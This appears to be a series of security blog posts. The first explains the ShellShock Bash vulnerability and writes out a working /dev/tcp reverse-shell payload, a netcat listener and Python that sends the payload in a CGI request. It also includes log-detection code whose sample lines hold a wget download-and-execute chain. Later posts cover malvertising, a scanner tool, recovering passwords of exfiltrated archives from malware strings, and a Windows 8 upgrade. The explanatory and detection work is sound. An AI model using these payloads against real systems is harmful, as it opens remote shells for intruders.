Exploiting ShellShock to get a reverse shell

A Bash vulnerability (aka ShellShock) was published two months ago (CVE-2014-6271, original release date 09/24/2014), reaching the highest score for Impact and Exploitability in the NIST NVD, with the following overview:

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

The first patch released was incomplete, and a second CVE (CVE-2014-7169, original release date 09/24/2014) was assigned to the part of the problem that remained after it, again with top score for Impact and Exploitability in the NIST NVD, with the following overview:

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271

Two months later ShellShock is still in the wild, used to exploit thousands of systems all around the net, installing PHP/Perl/IRC shells or any other malicious payload. This is possible because the original ShellShock report is now tracked together with five further CVEs:

  • CVE-2014-6271 (Initial report)
  • CVE-2014-6277
  • CVE-2014-6278
  • CVE-2014-7169
  • CVE-2014-7186
  • CVE-2014-7187

The following image, taken from the F5 website, explains how ShellShock works and why it is so dangerous:


Basically, by exploiting this vulnerability you can run any command (or any sequence of commands), but in 90% of the cases I have seen the final goal is installing a shell, usually in five steps:

  1. Exploit the vulnerability
  2. Download a script (Perl, Bash, C, etc.) from a remote site via wget, curl, etc.
  3. Save the script under /tmp
  4. Execute the script
  5. Clean up (remove the original file from /tmp)

In many cases this approach fails because Perl/PHP/C shells are detected and removed by the security safeguards protecting the system, and the remote sites can be blocked by web filtering policies. In recent days, however, I noticed a specific attack that downloads no malicious code at all and uses nothing but Bash itself:

() { ignored;};/bin/bash -i >& /dev/tcp/ip/port 0>&1

Let me explain better:

() { ignored;}; is the ShellShock trigger: Bash (through 4.3) parses a variable whose value starts with "() {" as a function definition and, because of the bug, keeps executing whatever follows the closing brace
/bin/bash -i starts an interactive Bash session
>& /dev/tcp/ip/port redirects standard output and standard error to the remote host through Bash's built-in /dev/tcp pseudo-device (e.g. /dev/tcp/1.2.3.4/8080 connects the session to IP 1.2.3.4 on TCP port 8080)
0>&1 makes the same socket the standard input, so whatever is typed on the listener reaches the shell. Strictly speaking it should be 0<&1, but both forms duplicate descriptor 1 onto descriptor 0 (the direction character is irrelevant to dup2), so it works either way

On the remote host a listener must be running: for testing I used nc -l 8080 (netcat listening on port 8080). Note that traditional netcat wants the port after -p (nc -l -p 8080), while the OpenBSD variant takes nc -l 8080.

This is a very interesting way to exploit ShellShock and get a reverse shell :)
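To make the two sides of this concrete, here is an added example (my own code, not from the original post) that builds the environment-variable payload and the CGI request that carries it, and then does the defender's job: scanning combined-format access-log lines for the "() {" trigger, classifying the attempt as a /dev/tcp reverse shell or a wget/curl download-and-execute chain, and pulling out the callback address. The host names, IP addresses and log lines are constructed for illustration.

```python
"""ShellShock payload construction and access-log detection.

Added example, not code from the original post.  The IP addresses, host
names and log lines below are constructed for illustration.
"""
import re
from typing import List, Optional, Tuple

# Bash (through 4.3) treats an environment variable whose value starts with
# "() {" as an exported function definition and, because of CVE-2014-6271,
# keeps executing whatever follows the closing brace when it imports it.
SHELLSHOCK_PREFIX = "() { ignored;};"


def build_reverse_shell_payload(ip: str, port: int) -> str:
    """The variable value from the post: a no-op function definition followed
    by an interactive Bash whose stdin/stdout/stderr are tied to /dev/tcp."""
    return f"{SHELLSHOCK_PREFIX}/bin/bash -i >& /dev/tcp/{ip}/{port} 0>&1"


def build_cgi_request(host: str, path: str, payload: str) -> str:
    """HTTP request carrying the payload in User-Agent.  mod_cgi/mod_cgid copy
    request headers into the CGI environment (User-Agent -> HTTP_USER_AGENT),
    which is how the crafted value crosses into a Bash-based CGI script."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {payload}\r\n"
        "Accept: */*\r\n"
        "\r\n"
    )


# Detection side.  The original trigger "() { :;};" and the malformed
# CVE-2014-7169 form "() { (a)=>\'" both begin with "() {".
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
DEVTCP_RE = re.compile(r"/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})")
DOWNLOAD_RE = re.compile(r"\b(?:wget|curl)\b")


def inspect_log_line(line: str) -> Optional[dict]:
    """Return a finding for a combined-format access-log line that carries a
    ShellShock attempt, else None.  Referer and User-Agent are logged in that
    format, so payloads sent in those two headers are visible here."""
    if not SHELLSHOCK_RE.search(line):
        return None
    m = DEVTCP_RE.search(line)
    if m:
        return {"technique": "reverse_shell", "target": (m.group(1), int(m.group(2)))}
    if DOWNLOAD_RE.search(line):
        return {"technique": "download_and_execute", "target": None}
    return {"technique": "other", "target": None}


def scan_log(lines: List[str]) -> List[Tuple[int, dict]]:
    """(line number, finding) for every line flagged by inspect_log_line."""
    return [(n, f) for n, l in enumerate(lines, 1)
            if (f := inspect_log_line(l)) is not None]


# Constructed sample log (combined format); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
MALFORMED_7169 = "() { (a)=>\\' /bin/bash -c 'echo vulnerable'"
SAMPLE_LOG = [
    '203.0.113.5 - - [24/Nov/2014:10:12:01 +0100] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { ignored;};/bin/bash -i >& /dev/tcp/198.51.100.7/8080 0>&1"',
    '203.0.113.9 - - [24/Nov/2014:10:12:05 +0100] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /usr/bin/wget http://198.51.100.7/x.pl -O /tmp/x.pl; perl /tmp/x.pl"',
    '198.51.100.20 - - [24/Nov/2014:10:13:00 +0100] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Nov/2014:10:14:00 +0100] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "'
    + MALFORMED_7169 + '"',
]

if __name__ == "__main__":
    print(build_cgi_request("victim.example", "/cgi-bin/status",
                            build_reverse_shell_payload("1.2.3.4", 8080)))
    for n, finding in scan_log(SAMPLE_LOG):
        print(f"line {n}: {finding}")
```

The detector is deliberately loose ("() {" anywhere in the line) because the 7169 variant and hand-tweaked payloads differ after the brace; on a real log, the false-positive rate of that pattern is essentially zero, so the classification step is where the analyst's time goes.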

Malvertising: una minaccia in espansione

Today the talk “Malvertising: una minaccia in espansione” (Malvertising: a growing threat) was hosted by “Festival ICT 2014″ in room 9 at 2:25 PM.
Giacomo Milani and I talked about malvertising threats, infection trends, attack vectors and exploitation techniques.
We also explained how to mitigate the risks related to malvertising.

From the ICT Festival abstract of “Malvertising: una minaccia in espansione” (translated from Italian):

“In the last twelve months web-borne threats have found a new distribution platform: web advertising networks. More and more internet publishers, whether bloggers or companies, offer part of their web space for the publication of advertisements in order to make a profit. Most of the websites we visit every day propose offers based on our interests, our searches and our habits, allowing the advertiser to be extremely effective. This characteristic, however, is increasingly being exploited to distribute malware and malicious code as well. During the talk we will analyse the evolution of the phenomenon, the techniques used and the related countermeasures.”

If you would like to download the “Malvertising: una minaccia in espansione” slides, check out my SlideShare account at http://www.slideshare.net/fantaghost

FgScanner included in BlackArch Linux

FgScanner has been included in BlackArch Linux. What is BlackArch Linux?

“BlackArch Linux is a lightweight expansion to Arch Linux for penetration testers and security researchers.

The repository contains 1059 tools. You can install tools individually or in groups. BlackArch is compatible with existing Arch installs. For more information, see the installation instructions. Please note that although BlackArch is past the beta stage, it is still a relatively new project. To report bugs and request new tools, please visit the issue tracker on Github, stop by IRC, or email us.”


Malware related archives decryption using strings command

The cyber attack landscape is evolving rapidly, reaching high levels of sophistication and complexity in order to exploit and breach enterprises, government entities, universities, financial institutions, etc., even in the presence of properly designed and well maintained defense-in-depth strategies. Basically the main stages of a targeted attack can be summarized in the following five steps:

  • Investigate
  • Infiltrate
  • Explore
  • Exfiltrate
  • Maintain Access

Each stage needs advanced tools and techniques in order to be completed stealthily, and the tools are often very specific to each target. In many cases those tools are written by the criminals only a few hours before their deployment in the targeted network, to evade detection systems and signature-based analysis. Alongside these custom tools, however, commercial utilities are also used for many other activities such as encryption, packaging, remote execution, remote access, etc.

RAR and ZIP archives are commonly used to compress and encrypt stolen data during the exfiltration phase of the attack. RAR is preferred to ZIP thanks to its AES-256 encryption, command line utilities for many architectures and operating systems, encryption of the archive listing (file names) as well as of the contents, etc.

Very often these archives are generated automatically by malware, scheduled tasks, command line utilities or attacker actions, and they can be identified by their filename structure on the infected filesystems or after a forensic analysis: for example YEAR_MONTH_DAY_USERID_HOSTNAME.RAR or similar.

If the archive listing is blocked or encrypted, we cannot understand which data is included in the stolen archives, and we have to start a password recovery task in order to open the files.
There are several options to achieve this goal:

  • free or commercial tools on a single host
  • commercial tools for distributed tasks over several machines
  • online password recovery services
  • GPU cracking utils
  • hardware acceleration based on FPGA

Each method listed above can take hours, days, months or years to complete, depending on the length and/or complexity of the password used to protect the files, but we can speed up the process by using a very specific dictionary file containing malware-related strings.
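As an added example of that idea (my own code, not the post's own procedure), the block below reimplements the relevant part of the strings command in Python, extracting both printable ASCII runs and UTF-16LE runs (the latter is what strings -e l prints, and is where Windows malware keeps most of its text), turns them into a deduplicated wordlist and tries each candidate against the archive. The sample "binary" and the password behind the stand-in checker are constructed; the real check against a RAR file is sketched in rar_checker(), which assumes the unrar command line tool is installed and is not invoked in the sample run.

```python
"""Build a password dictionary from the strings inside a malware sample and
try it against an encrypted archive.

Added example, not code from the original post.  The sample "binary" and
the password behind the stand-in checker are constructed; the real check
against a RAR file is sketched in rar_checker() and assumes unrar is
installed.
"""
import hashlib
import re
import subprocess
from typing import Callable, Iterable, List, Optional


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Mimic the `strings` command: printable ASCII runs of at least min_len
    bytes, plus UTF-16LE runs (what `strings -e l` prints)."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    out = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    out += [m.group().decode("utf-16-le") for m in wide_re.finditer(data)]
    return out


def build_wordlist(strings: Iterable[str], min_len: int = 4) -> List[str]:
    """Turn raw strings into candidates: each whole string plus the
    whitespace-separated tokens inside it, deduplicated, order preserved."""
    seen, out = set(), []
    for s in strings:
        for cand in [s.strip()] + s.split():
            if len(cand) >= min_len and cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def recover_password(candidates: Iterable[str],
                     check: Callable[[str], bool]) -> Optional[str]:
    """First candidate accepted by check(), or None when the list is exhausted."""
    for cand in candidates:
        if check(cand):
            return cand
    return None


def rar_checker(archive: str) -> Callable[[str], bool]:
    """Real-world check: `unrar t -p<pw> -y <archive>` exits 0 only when the
    password decrypts the archive.  Not invoked in the sample run below."""
    def check(pw: str) -> bool:
        res = subprocess.run(["unrar", "t", f"-p{pw}", "-y", archive],
                             stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        return res.returncode == 0
    return check


# Constructed stand-in for the archive: accept the password whose SHA-256
# matches, so the example runs without a RAR file.
_TRUE_PASSWORD_SHA256 = hashlib.sha256(b"Exfil2014!").hexdigest()


def fake_archive_check(pw: str) -> bool:
    return hashlib.sha256(pw.encode()).hexdigest() == _TRUE_PASSWORD_SHA256


# Constructed "malware sample": a fake PE header, a couple of imports, a RAR
# command line fragment and the archive password stored as a wide string.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"CreateFileW\x00GetProcAddress\x00"
    + b"rar a -hp -m5 \x00"
    + b"\x01\x02\x03"
    + "Exfil2014!".encode("utf-16-le") + b"\x00\x00"
    + b"\xff\xfe\x07"
)

if __name__ == "__main__":
    words = build_wordlist(extract_strings(SAMPLE_BINARY))
    print("dictionary:", words)
    print("recovered:", recover_password(words, fake_archive_check))
```

In practice the dictionary would be fed to a proper cracker (hashcat, John, or the commercial tools listed above) rather than to a serial unrar loop, but the point is the same: a few hundred strings lifted from the sample are tried long before any brute force or generic wordlist.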


Windows 8 upgrade: the nightmare begins

Some days ago I was asked to help a friend choose a new laptop: she explained her budget, the target applications and her needs. At the end of the scouting process we decided together to buy an Asus N550L notebook.
The configuration is awesome: Intel i7-4500U, 8 GB RAM, 1 TB hard drive at 5400 rpm (this is the real bottleneck!!!), Nvidia GeForce 745M with 4 GB, Bluetooth 4.0, aluminium case, everything packed in a 15.6″ form factor.

First of all I wanted to buy a Windows 7 Professional license and downgrade the system, but the vendor told me that Windows 7 is not supported by Asus on the N550L. Searching the Asus website I found drivers and utilities for Windows 8 only. I'm really disappointed about this, because I'm quite sure that Windows 7 is not yet End of Life! Anyway, I moved on to plan B and decided to upgrade to Windows 8.1 Update 1, as suggested by Microsoft, in order to work in Desktop mode. I'm sure she will appreciate the “new” look and feel...

At 5 pm I started unboxing the laptop (the Asus packaging is very well done and really accurate) and the first Windows setup. I clicked on the Store tile to start the Windows upgrade, but the system requires all the latest updates to be installed before starting. The first round consisted of about 80 updates and required a reboot. The second round consisted of about 20 new updates and required a reboot. The last round was dedicated to driver upgrades and required a reboot. Well done: after about 1 hour of installing updates and rebooting the laptop, I was finally ready to start the upgrade. I chose the upgrade tile in the Microsoft Store and the system told me that it needs to download 3.2 GB! Really, 3.2 GB! Is this an upgrade? What about a fresh install instead? Crazy... As you probably know, in Italy we are not famous for ADSL broadband speed (we are not famous for many other things either, but that doesn't matter), so the download took about 2 hours on 7 Mbit/s...
